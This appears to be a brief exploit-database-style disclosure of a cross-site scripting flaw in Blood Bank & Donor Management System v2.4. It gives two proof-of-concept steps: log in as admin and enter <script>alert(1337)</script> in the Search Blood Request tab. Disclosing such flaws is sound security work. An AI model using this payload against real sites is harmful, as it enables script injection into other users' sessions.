# Exploit Title: Blood Bank & Donor Management System v2.4 - Cross
Site Scripting (XSS)
# Date: 2025-04-07
# Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un
# Vendor: https://phpgurukul.com/blood-bank-donor-management-system-free-download/
# Demo Site: http://localhost/BBDMS-Project-PHP-V2.4/bbdms
# Tested on: Kali Linux
# CVE: N/A

PoC:

1. login as admin
2. go to "Search Blood Request" tab and give this xss payload

<script>alert(1337)</script>